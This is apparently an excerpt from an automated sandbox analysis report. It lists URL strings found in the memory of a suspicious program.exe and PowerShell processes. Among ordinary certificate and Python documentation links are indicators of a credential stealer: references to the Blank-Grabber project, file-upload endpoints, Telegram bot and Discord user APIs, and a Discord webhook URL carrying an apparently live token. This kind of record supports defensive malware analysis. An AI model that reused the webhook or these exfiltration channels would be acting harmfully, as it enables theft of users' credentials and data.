              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000008.00000002.1917964780.000001A853E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic;
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B1DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: program.exe, 00000001.00000003.2002700653.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE1EA000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE1ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: program.exe, 00000001.00000002.2110707812.000001B5FF148000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: program.exe, 00000001.00000002.2114614682.000001B5FFA7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B1DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: program.exe, 00000001.00000003.1851652911.000001B5FF209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot0
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-
              Source: program.exe, 00000001.00000003.1851652911.000001B5FF209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: program.exe, 00000001.00000003.1713530178.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718315279.000001B5FDD08000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1713899896.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714242309.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718558053.000001B5FDD11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1725898997.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714439286.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727743647.000001B5FDCB7000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1723691817.000001B5FDD15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: program.exe, 00000001.00000002.2105759928.000001B5FDE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: program.exe, 00000001.00000002.2107071806.000001B5FE450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: program.exe, 00000001.00000003.1720139515.000001B5FE45D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1724687478.000001B5FE13E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1721395579.000001B5FE107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: program.exe, 00000001.00000003.1727613686.000001B5FDCC1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727759704.000001B5FDD25000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: program.exe, 00000001.00000002.2107071806.000001B5FE450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106525715.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002183639.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/29200
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: program.exe, 00000001.00000003.1754035626.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106525715.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759827513.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106760693.000001B5FE3B1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103757155.000001B5FE3AE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE333000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002183639.000001B5FE33B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: program.exe, 00000001.00000002.2114614682.000001B5FFA88000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2114614682.000001B5FFA64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
              Source: program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
              Source: program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107200618.000001B5FE560000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: program.exe, 00000001.00000003.1711208827.000001B5FDA11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: program.exe, 00000001.00000003.1765670308.000001B5FEDFE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799219548.000001B5FEDBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1785586254.000001B5FEDFE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1798717006.000001B5FEDFE000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1765670308.000001B5FEDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF22F000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104205317.000001B5FE394000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104116645.000001B5FE382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
